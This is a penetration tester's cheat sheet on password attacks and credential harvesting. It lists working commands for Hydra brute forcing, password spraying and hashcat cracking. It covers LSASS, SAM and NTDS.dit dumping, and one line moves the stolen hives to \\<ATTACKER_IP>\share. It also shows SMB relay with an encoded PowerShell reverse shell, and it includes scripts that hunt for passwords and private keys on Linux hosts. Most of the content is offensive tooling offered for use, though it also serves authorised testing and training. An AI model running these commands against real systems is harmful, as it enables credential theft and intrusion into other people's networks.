Pentest_Notes

🔑 Password Attacks & Credential Harvesting

Organized notes for password attacks, cracking, and credential harvesting. Last Updated: 2026-03-27


Wordlist Generation

Checklist

CeWL — Custom Wordlist from Website

cewl https://www.target.com -d 4 -m 6 --lowercase -w custom.wordlist

Hashcat Rule-Based Mutation

hashcat --force password.list -r custom.rule --stdout > mut_password.list
hashcat --force password.list -r /usr/share/hashcat/rules/best64.rule --stdout > mut_password.list

Username Generation

./username-anarchy -i /path/to/firstlastnames.txt

Online Attacks (Brute Force)

Hydra

# Generic syntax
hydra -L user.list -P password.list <service>://<ip>

# Credential stuffing
hydra -C <user_pass.list> ssh://<IP>

# SSH
hydra -L users.txt -P passwords.txt ssh://<IP>

# HTTP Basic Auth
hydra -L wordlist.txt -P wordlist.txt -u -f <IP> -s <PORT> http-get /

# HTTP POST Form
hydra -l admin -P wordlist.txt -f <IP> -s <PORT> http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"

# POP3
hydra -L users.txt -p 'Company01!' -f <IP> pop3

CrackMapExec / NetExec

# SAM dump
crackmapexec smb <ip> --local-auth -u <user> -p <pass> --sam

# LSA secrets dump
crackmapexec smb <ip> --local-auth -u <user> -p <pass> --lsa

# NTDS dump
crackmapexec smb <ip> -u <user> -p <pass> --ntds

# Password spraying: one password across the user list; --continue-on-success keeps going after a hit
nxc smb <IP_RANGE> -u users.txt -p 'Password1' --continue-on-success

# Paired lists (user line 1 with password line 1, ...): that is what --no-bruteforce is for
nxc smb <IP_RANGE> -u users.txt -p passwords.txt --no-bruteforce --continue-on-success

Offline Attacks (Hash Cracking)

Hashcat

# NTLM (crack first; --show only prints what is already in the potfile, it does not crack)
hashcat -m 1000 <hash> /usr/share/wordlists/rockyou.txt
hashcat -m 1000 <hash> --show

# NTLMv2
hashcat -m 5600 <hash_file> /usr/share/wordlists/rockyou.txt

# Kerberos TGS (Kerberoasting)
hashcat -m 13100 tgs.hash /usr/share/wordlists/rockyou.txt --force

# AS-REP (ASREPRoasting)
hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# Linux shadow (sha512crypt, $6$)
hashcat -m 1800 -a 0 unshadowed.hashes rockyou.txt -o cracked.txt
# If hashcat rejects the trailing /etc/passwd fields (token length exception), keep only user:hash
cut -d: -f1,2 unshadowed.hashes > shadow.hashes
hashcat -m 1800 -a 0 --username shadow.hashes rockyou.txt -o cracked.txt

Common Hashcat Modes

Mode   Hash Type
0      MD5
100    SHA1
1000   NTLM
1800   sha512crypt (Linux /etc/shadow, $6$)
3200   bcrypt
5600   NTLMv2
13100  Kerberos 5 TGS-REP, etype 23 (RC4)
18200  Kerberos 5 AS-REP, etype 23 (RC4)

AES tickets (etype 17/18) need 19600/19700 for TGS-REP and 19800/19900 for AS-REP; check the $krb5tgs$<etype>$ / $krb5asrep$<etype>$ prefix before picking the mode.
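Added example (not part of the original notes), serving both the mode table above and the shadow-cracking step in the Hashcat section: a function that picks the hashcat mode from the hash format, a passwd+shadow merge that emits only the user:hash lines hashcat wants with --username, and a helper that composes the hashcat command line. Every hash below is a constructed dummy, not a real credential; the 32-hex case is reported as NTLM (1000) on the assumption that it came from a Windows dump, use 0 for raw MD5.

```sh
#!/bin/sh
# Added example: hashcat mode detection and shadow preparation in plain sh.
# All hashes in this file are constructed dummies.

# hash_mode <hash>: print the hashcat -m value, or fail if the format is unknown.
hash_mode() {
    h=$1
    case "$h" in
        '$6$'*)                   echo 1800 ;;   # sha512crypt
        '$2a$'*|'$2b$'*|'$2y$'*)  echo 3200 ;;   # bcrypt
        '$krb5tgs$23$'*)          echo 13100 ;;  # Kerberoast, RC4 ticket
        '$krb5asrep$23$'*)        echo 18200 ;;  # AS-REP roast, RC4
        *::*:*:*:*)               echo 5600 ;;   # NTLMv2: user::DOMAIN:chal:proof:blob
        *)
            if   printf '%s' "$h" | grep -Eq '^[0-9a-fA-F]{40}$'; then echo 100   # SHA1
            elif printf '%s' "$h" | grep -Eq '^[0-9a-fA-F]{32}$'; then echo 1000  # NTLM (assumed; 0 for raw MD5)
            else return 1
            fi ;;
    esac
}

# shadow_to_hashcat <passwd> <shadow>: user:hash for accounts that have a real hash.
# Locked/unset fields (*, !, !!, empty) and users absent from passwd are dropped.
shadow_to_hashcat() {
    awk -F: 'NR==FNR { seen[$1] = 1; next }
             ($1 in seen) && substr($2, 1, 1) == "$" { print $1 ":" $2 }' "$1" "$2"
}

# hashcat_cmd <hashfile> [wordlist] [username]: compose the hashcat command line.
# Pass "username" as the third argument when the file holds user:hash lines.
hashcat_cmd() {
    file=$1; wl=${2:-/usr/share/wordlists/rockyou.txt}; flag=""
    line=$(head -n 1 "$file")
    if [ "$3" = username ]; then line=${line#*:}; flag="--username "; fi
    mode=$(hash_mode "$line") || { echo "unrecognised hash format: $line" >&2; return 1; }
    echo "hashcat -m $mode -a 0 $flag$file $wl"
}

# demo: constructed passwd/shadow pair and a constructed NTLMv2 capture.
demo() {
    tmp=$(mktemp -d)
    printf 'root:x:0:0:root:/root:/bin/sh\nalice:x:1000:1000::/home/alice:/bin/sh\n' > "$tmp/passwd"
    printf 'root:*:19000:0:99999:7:::\nalice:$6$saltsalt$dummyhashdummyhash:19000:0:99999:7:::\n' > "$tmp/shadow"
    shadow_to_hashcat "$tmp/passwd" "$tmp/shadow" > "$tmp/shadow.hashes"
    hashcat_cmd "$tmp/shadow.hashes" rockyou.txt username
    printf 'alice::CORP:1122334455667788:00112233445566778899aabbccddeeff:0101000000000000\n' > "$tmp/ntlmv2.hash"
    hashcat_cmd "$tmp/ntlmv2.hash"
}
```

Run demo to see the two composed command lines; the functions print the commands rather than running hashcat so they can be checked before a long cracking job starts.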

John the Ripper

# Basic crack
john --wordlist=rockyou.txt hash.txt

# PDF hash
john --wordlist=rockyou.txt pdf.hash

# Unshadow for Linux
unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes

# Converters
office2john.py Protected.docx > protected-docx.hash
ssh2john id_rsa > id_rsa.hash
zip2john archive.zip > zip.hash

Credential Harvesting — Windows

# Search for passwords in files
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml

# LSASS dump (needs local admin / SeDebugPrivilege; the comsvcs MiniDump export is commonly flagged by AV/EDR)
Get-Process lsass
rundll32 C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dmp full

# Registry hive extraction
reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save

# Transfer files (secretsdump needs the SYSTEM hive alongside SAM)
move sam.save \\<ATTACKER_IP>\share
move system.save \\<ATTACKER_IP>\share

# NTDS.dit extraction (the file is locked, so copy it from a shadow copy; the copy index comes from the vssadmin output)
vssadmin CREATE SHADOW /For=C:
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit
reg.exe save hklm\system C:\NTDS\system.save

# Parse LSASS dump
pypykatz lsa minidump /path/to/lsass.dmp

# Parse registry hives
impacket-secretsdump -sam sam.save -system system.save LOCAL

# Parse NTDS.dit offline (SYSTEM hive required to decrypt it)
impacket-secretsdump -ntds NTDS.dit -system system.save LOCAL

Credential Harvesting — Linux

# Configuration files (grep needs -E; without it "lib|fonts|..." is one literal string and nothing gets filtered)
for l in .conf .config .cnf; do echo -e "\nFile extension: $l"; find / -type f -name "*$l" 2>/dev/null | grep -Ev "lib|fonts|share|core"; done

# Credentials in configs (skip commented-out lines)
find / -type f -name "*.cnf" 2>/dev/null | grep -Ev "doc|lib" | while read -r i; do echo -e "\nFile: $i"; grep -iE "user|password|pass" "$i" 2>/dev/null | grep -v "^[[:space:]]*#"; done

# Database files (patterns quoted so the shell does not expand them against the current directory)
for l in .sql .db '.*db' '.db*'; do echo -e "\nDB File extension: $l"; find / -type f -name "*$l" 2>/dev/null | grep -Ev "doc|lib|headers|share|man"; done

# Text files and extensionless files in home directories (parentheses make -type f apply to both branches)
find /home/* -type f \( -name "*.txt" -o ! -name "*.*" \) 2>/dev/null

# SSH keys (-l lists matching files; "| grep :1" only caught headers that sat on line 1)
grep -rlw "PRIVATE KEY" / 2>/dev/null
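Added example (not part of the original notes): the Linux harvesting loops above as functions with the grep alternation, quoting and find precedence fixed, run against a constructed sample tree so they can be tried offline. All paths, file contents and the credential string are made up; the noisy-path exclusion list is an assumption carried over from the loops above.

```sh
#!/bin/sh
# Added example: Linux credential harvesting helpers over a constructed tree.
# Nothing here is a real path or a real credential.

# make_sample_tree: build a constructed filesystem and print its root.
make_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/etc/app" "$root/home/dev/.ssh" "$root/usr/lib/pkg"
    printf '# password = commented-out, ignore\nuser = appsvc\ndb_password = Winter2024!\n' > "$root/etc/app/app.cnf"
    printf 'password = noise\n' > "$root/usr/lib/pkg/pkg.conf"      # under lib/, should be skipped
    printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' 'AAAA' '-----END OPENSSH PRIVATE KEY-----' > "$root/home/dev/.ssh/id_ed25519"
    printf 'rotate the db creds\n' > "$root/home/dev/notes.txt"
    printf 'all:\n' > "$root/home/dev/Makefile"                       # extensionless file
    echo "$root"
}

# find_configs <root>: config files minus noisy library/doc paths.
# -E is required: without it grep -v "lib|fonts" looks for that literal string.
find_configs() {
    for ext in .conf .config .cnf; do
        find "$1" -type f -name "*$ext" 2>/dev/null
    done | grep -Ev '/(lib|fonts|share|core|doc)/'
}

# grep_creds <root>: file:line:text for credential-looking keys, comments dropped.
grep_creds() {
    find_configs "$1" | while read -r f; do
        grep -HniE 'user|pass|secret|token' "$f" 2>/dev/null
    done | grep -Ev '^[^:]+:[0-9]+:[[:space:]]*#'
}

# find_private_keys <root>: files containing a PEM private-key header on any line
# (the "| grep :1" trick in the one-liner only catches a header on line 1).
find_private_keys() {
    grep -rlE -e '-----BEGIN [A-Z ]*PRIVATE KEY-----' "$1" 2>/dev/null
}

# find_home_notes <root>: .txt files and extensionless files under home/.
# The parentheses matter: without them -type f binds only to the .txt branch.
find_home_notes() {
    find "$1/home" -type f \( -name '*.txt' -o ! -name '*.*' \) 2>/dev/null
}

demo() {
    root=$(make_sample_tree)
    echo "== credentials in configs"; grep_creds "$root"
    echo "== private keys";          find_private_keys "$root"
    echo "== home notes";            find_home_notes "$root"
}
```

Point the functions at / on a real host (they take the root as an argument, so a mounted image or a copied tree works too); the exclusion list in find_configs is where most of the tuning happens.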

SMB Relay & NTLM Theft

# Find hosts where SMB signing is not required (relay only works against those)
nxc smb <IP_RANGE> --gen-relay-list relay_targets.txt

# SAM dump via relay (default action when no command is given)
impacket-ntlmrelayx --no-http-server -smb2support -t <TARGET_IP>

# Reverse shell via relay
impacket-ntlmrelayx --no-http-server -smb2support -t <TARGET_IP> -c 'powershell -e <BASE64_REVSHELL>'

Common Pitfalls / Gotchas

References & Further Reading